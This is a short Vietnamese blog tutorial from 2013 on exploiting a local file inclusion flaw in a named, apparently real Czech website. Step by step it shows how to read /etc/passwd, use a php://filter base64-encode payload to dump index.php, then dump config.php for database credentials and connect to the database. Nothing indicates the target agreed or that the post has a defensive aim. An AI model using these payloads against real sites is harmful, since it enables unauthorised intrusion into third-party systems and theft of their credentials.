Thứ Hai, 4 tháng 2, 2013
Tutorial : LFI php://filter
Bước 1: Tìm link bị lỗi LFI
http://www.hctjstbk.cz/index.php?page=/etc/passwd
Bước 2: Kiểm tra qua /proc/self/environ -> Không được
php://input -> Không được
php://filter/convert.base64-encode/resource=index.php -> okie
Bước 3: Do website mã hóa dùng php://filter file index.php
http://www.hctjstbk.cz/index.php?pag...x.php&soutez=2
[IMG]
This image has been resized.Click to view original image |
Bước 4: View Source copy đoạn mã hóa của file index.php-> vào website giải mã base64 online ở đây mình dùng website
http://www.rbl.jp/base64.php
[IMG]
This image has been resized.Click to view original image |
Bước 5: Sau khi giải mã file index.php để ý đoạn sau config/config.php
Bước 6: php filter file config/config.php
http://www.hctjstbk.cz/index.php?pag...g.php&soutez=2
Viewsource giải mã được database như sau
[IMG]
This image has been resized.Click to view original image |
Bước 7: Connect DB
End tut kakavn_85
Chuyên Mục:
Hacking and Security
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: